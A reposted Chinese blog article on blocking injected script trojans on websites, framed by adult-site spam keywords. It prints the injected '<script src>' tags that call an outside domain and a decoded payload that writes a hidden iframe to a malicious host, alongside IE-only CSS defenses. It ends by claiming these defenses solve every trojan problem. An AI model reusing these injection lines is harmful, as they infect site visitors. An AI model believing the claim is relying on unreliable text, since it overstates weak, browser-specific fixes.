亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 網站 > 網站安全 > 正文

解決全部網頁木馬的技巧

2024-09-06 18:38:35
字體:
來源:轉載
供稿:網友

還是掛馬問題,這段時間,我漸漸感到壓力,頭大,通過qq或msn加我的人越來越多,我最近自己的工作本來就忙得不亦樂乎。哎,想想,還是要抽空來來幫幫大家。

前不久《一行代碼解決iframe掛馬(包含服務器端注入、客戶端arp注入等)》得到了很多朋友的認可,這確實是個避避風雨的好辦法??涩F在掛網馬的方式真如我所料地改變了,現在流行掛<script>木馬,汗了,看了幾個網友的網站都被這樣了——頁面的頂部或底部加上了:

注意,以下地址含有木馬,請不要輕易訪問:

<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>

汗死,一連插入了n個一樣的<script>標記。偶的電腦什么補丁都打了,直接訪問這個http://%76%63%63%64%2e%63%6e(或直接使用迅雷下載),額~ 現形了:

document.write("<div style='display:none'>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")

又用迅雷下載http://a.158dm.com/b1.htm這個文件,一看,亂七八糟的js編碼,汗,不過找到了一個類似qq號的數字,直接加加看,汗,然后是專業提供網馬的組織,哎,什么世道。還收費蠻高滴呢!

...
var kfqq, qqs="[color=magenta]784378237[/color]"; qwfgsg="llll//xxxxxld"; kfqq = qqs;
(...略)(下面還有n個統計的js代碼)

針對上面的情況,我也不能白白瞧著不管,想想辦法吧,兄弟。喝了碗綠豆粥,糖放得蠻多的,好喝。辦法想到了。稍微分析就得出了答案。大家來看看,<script>木馬的特點是什么:

<script src=http://%76%63%63%64%2e%63%6e></script>

對了,script木馬的src一般都是外域的,也就是src是以http打頭的,如果是自己網站的script一般都不用加上http;再看看木馬的原形,里面還是輸出的iframe、js代碼或是其他<object>代碼,不管這么多,來多少殺多少。

來跟我寫css,一一搞定它們,我寫了5種不同的方案,大家來測試一下哈:

解決方案1

iframe{n1ifm:expression(this.src='about:blank',this.outerhtml='');}/*這行代碼是解決掛iframe木馬的哦*/
script{nojs1:expression((this.src.tolowercase().indexof('http')==0)?document.write('木馬被成功隔離!'):'');}

原理:將<script>標記的src拿出來轉為小寫,再看是不是以“http”開頭的外域js腳本文件,如果是,則頁面內容清空并寫出“木馬被成功隔離!”。反之正常顯示。

缺點:訪客無法看到被感染了<script>木馬的頁面。

解決方案2

iframe{nifm2:expression(this.src='about:blank',this.outerhtml='');}
script{no2js:expression((this.src.tolowercase().indexof('http')==0)?document.close():'');}

原理:將外域的js文件的document.write()使用document.close()強制關閉。木馬內容還沒有來得及寫完,只有部分被強制緩存輸出了,剩下的不會再寫了。

|||

解決方案3

iframe{ni3fm:expression(this.src='about:blank',this.outerhtml='');}
script{n3ojs:expression((this.src.tolowercase().indexof('http')==0)?document.execcommand('stop'):'');}

原理:同到外域的js文件,立即調用ie私有的execcommand方法來停止頁面所有請求,所以接下來的外域js文件也被強制停止下載了。就像我們點了瀏覽器的“停止”按鈕一樣??磥磉@是js模擬ie停止按鈕的一種方法。

解決方案4

iframe{nif4m:expression(this.src='about:blank',this.outerhtml='');}
script{noj4s:expression(if(this.src.indexof('http')==0)this.src='res://ieframe.dll/dnserror.htm');}

原理:將外域的js文件的src重寫成本地ie404錯誤頁面的地址,這樣,外域的js代碼不會下載。

解決方案5:

iframe{nifm5:expression(this.src='about:blank',this.outerhtml='');}
script{noj5s:expression((this.id.tolowercase().indexof('lh')==0)?document.write('木馬被成功隔離!'):''));}

第五種方案的頁面html源代碼<script>中要加入以"lh"為前綴的id,如lhweatherjsapi,<script src="***/**.js" id="lhsearchjsapi"></script> 

以下頁面代碼里含有一個木馬地址,而且木馬在頁面里重復了6次,大家分別用我上面的不同方案測試一下,看看我的研究如何?。ù藴y試有一定的危險性,請務必打好所有補丁再測試)

<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>讓js木馬的進程迅速中止的css代碼</title>
<style type="text/css" id="linrstudio">
/*<![cdata[*/
iframe{nhk1:expression(this.src='about:blank',this.outerhtml='');}
script{ngz1:expression((this.src.indexof('http')==0)?document.close():'');}
/* 以后請在此關注最新木馬處理方法:http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
</style>
</head>
<body>
<script type="text/javascript" src="1.js"></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src="http://%76%63%63%64%2e%63%6e" type="text/javascript"></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
我是頁面本身的1
<script src=http://%76%63%63%64%2e%63%6e></script>
我是頁面本身的2
<script src=http://%76%63%63%64%2e%63%6e></script>
我是頁面本身的3
<script src=http://%76%63%63%64%2e%63%6e></script>
</body>
</html>

其中1.js是自己本站的:

document.write("我是本站的js文件");
document.write("<img src='http://www.baidu.com/images/logo.gif' />");

我的測試環境是:

windows xp sp2 和windows vista sp1
ie6/ie7/ie8
已全部打好補丁。

綜上所述,所有目前的掛馬方式全都破解了,用css就可以解決所有木馬問題,訪客不會再輕易地中毒了。

大家也要仔細研究一下,看看我的代碼有什么bug,有的話一定要拿出來討論,好解決問題!或是各位有其他更好的辦法可以拿出來討論一下。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
中文字幕欧美亚洲| 日韩国产欧美精品在线| 两个人的视频www国产精品| 亚洲最新av在线网站| 青青青国产精品一区二区| 性色av一区二区三区在线观看| 日韩视频在线免费观看| 亚洲风情亚aⅴ在线发布| 欧美肥老太性生活视频| 欧美精品videosex牲欧美| 欧美超级乱淫片喷水| 国产精品久久视频| 欧美极品在线播放| 久久亚洲精品国产亚洲老地址| 538国产精品视频一区二区| 亚洲最大av网站| 国产视频在线一区二区| 欧美美女操人视频| 日韩美女免费视频| 亚洲一区二区免费| 丝袜亚洲欧美日韩综合| 欧美综合一区第一页| 久热在线中文字幕色999舞| 亚洲视频在线视频| 蜜臀久久99精品久久久无需会员| 日韩精品中文字幕在线| 中日韩美女免费视频网址在线观看| 日韩亚洲国产中文字幕| 亚洲mm色国产网站| 日韩精品免费在线观看| 国产97色在线|日韩| 国产精品免费看久久久香蕉| 亚洲国产精品女人久久久| 久久久人成影片一区二区三区观看| 午夜精品一区二区三区在线| 国产日韩欧美影视| 精品久久久久久久久久久| 久久精品成人欧美大片古装| 伊是香蕉大人久久| 日韩欧美一区二区在线| 欧美精品在线观看91| 免费av一区二区| 亚洲午夜激情免费视频| 欧美一级电影在线| 国产精品久久久久久久久久东京| 欧美成人h版在线观看| 欧美性高潮床叫视频| 欧美国产日本高清在线| 欧美在线视频导航| 国产国产精品人在线视| 欧美中文字幕第一页| 国产国产精品人在线视| 久久久精品视频成人| 国产成人jvid在线播放| yw.139尤物在线精品视频| 国产精品三级在线| 黄色成人av在线| 91av免费观看91av精品在线| 亚洲已满18点击进入在线看片| 亚洲qvod图片区电影| 伊人精品在线观看| 欧美高清第一页| 福利二区91精品bt7086| 色婷婷亚洲mv天堂mv在影片| 国产日韩一区在线| 国产999精品久久久| 精品偷拍各种wc美女嘘嘘| 日韩精品视频中文在线观看| 久久久久久久久久婷婷| 欧美黄色成人网| 日韩av第一页| 日韩av免费在线播放| 亚洲久久久久久久久久久| 亚洲第一偷拍网| 在线免费看av不卡| 成人在线免费观看视视频| 亚洲女人天堂成人av在线| 久久av红桃一区二区小说| 国产亚洲欧洲高清| 国产亚洲精品成人av久久ww| 久久精品国产欧美亚洲人人爽| 26uuu另类亚洲欧美日本老年| 粉嫩老牛aⅴ一区二区三区| 亚洲国产精品久久久久秋霞不卡| 国产91精品最新在线播放| 久久久这里只有精品视频| 精品综合久久久久久97| 亚洲视频一区二区三区| 亚洲高清一二三区| 亚洲成人av片在线观看| 日韩欧美国产激情| 91精品国产高清久久久久久| 色999日韩欧美国产| 亚洲精品美女在线观看播放| 国产婷婷97碰碰久久人人蜜臀| 国产欧美亚洲视频| 欧洲永久精品大片ww免费漫画| 日韩视频一区在线| 国产精品一区二区3区| 国产精品亚发布| 欧美中文字幕第一页| 91精品国产色综合久久不卡98| 亚州欧美日韩中文视频| 国产精品久久久久秋霞鲁丝| 成人天堂噜噜噜| 亚洲精品福利在线| 欧美色视频日本高清在线观看| 成人在线视频福利| 欧美日韩电影在线观看| 美女啪啪无遮挡免费久久网站| 久热在线中文字幕色999舞| 亚洲偷欧美偷国内偷| 久久久久九九九九| 久久久免费高清电视剧观看| 国产精品日韩av| 91国内免费在线视频| 国产99久久精品一区二区永久免费| 91美女高潮出水| 国产97色在线|日韩| 国产日韩欧美日韩大片| 成人黄色免费看| 亚洲精品黄网在线观看| 亚洲欧美国产视频| 欧美专区在线视频| 亚洲乱码一区av黑人高潮| 色婷婷综合久久久久中文字幕1| 国产成+人+综合+亚洲欧美丁香花| 亚洲精品小视频| 久久精品亚洲国产| 国产精品啪视频| 国产不卡一区二区在线播放| 亚洲www永久成人夜色| 热久久视久久精品18亚洲精品| 日韩欧美福利视频| 91九色国产在线| 成人久久18免费网站图片| 欧美天天综合色影久久精品| 色视频www在线播放国产成人| 久久99亚洲精品| 国产这里只有精品| 色综合色综合久久综合频道88| 欧美性20hd另类| 午夜精品久久久久久久白皮肤| 国产日韩换脸av一区在线观看| 亚洲男人av电影| 亚洲在线免费观看| 国内免费久久久久久久久久久| 久久精品视频导航| 中文欧美日本在线资源| 在线观看日韩视频| 亚洲成人黄色网| 久久久久久噜噜噜久久久精品| 亚洲电影免费观看| 日韩中文av在线| 久久人人爽人人| 亚洲成人精品av| 成人性生交xxxxx网站| 国产成+人+综合+亚洲欧美丁香花| 国产视频在线观看一区二区| 日韩电影在线观看免费| 亚洲欧美中文日韩在线v日本| 一区二区成人av| 日韩在线精品一区| 成人欧美一区二区三区在线|